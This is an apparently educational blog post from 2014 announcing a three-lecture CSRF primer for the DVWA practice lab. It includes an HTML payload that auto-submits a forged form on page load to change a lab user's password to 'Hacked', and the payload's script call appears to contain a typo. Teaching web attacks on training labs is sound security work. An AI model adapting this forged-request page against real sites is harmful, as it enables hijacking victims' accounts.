Showing posts with label Complete CSRF attacks. Show all posts
Showing posts with label Complete CSRF attacks. Show all posts

Thursday, 20 March 2014



Hello Dear Friends , How are You? Hope You will be Fine :)

Currently I've Completed Two Primers of with Great Stuff & Information



Now I'm Here With CSRF Primer. and I Hope You Guyz Will Like My stuff, Don't Forget to Share us and incase of Any queries You are More than Welcome to Drop me an E mail or Comment Down Your Problem Without Any Hesitation , I'll Get Back to You as soon as Possible.

Now Lets Start Our Journey Toward CSRF - Cross Site Request Forgery

Lecture #1


Covering The Misconceptions & Intro to CSRF



Lecture #2


Performing CSRF Attack and Understanding the Mechanism Practically


Requirements:


  1. DVWA Lab
  2. Attacking Payload Which i've Provided


Attacking Payload:



<html><!--
HTML Attack Code For CSRF inside DVWA Lab . Security Type : Low Author : Muhammad Adeel | Founder UrduSecurity (c) 2014

--><body onload="document.frames[o].submit()">
<form action="http://192.168.186.128/dvwa/vulnerabilities/csrf/?password_new=Hacked&password_conf=Hacked&Change=Change#" method="POST">
<input name="CSRF1" value="Muhammad Adeel"><input name="CSRF2" value="UrduSecurity">
</form></body></html>



Lecture #3


Preventing YourSelf From Being Victim of CSRF




---------------------------------------------------------------------------------------------
Hope I've cleared Every thing, If You Guys Have any Problem to Understand This Primer , Please Let me Know By Commenting down Your Queries Below the Post , Thanks For Your FeedBack for HTML&JS Primer and MetaSploit Expert Primer.
---------------------------------------------------------------------------------------------

UrduSecurity CSRF Primer Complete Guidance

By: Adeel Chaudhary on: 23:50

 
Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity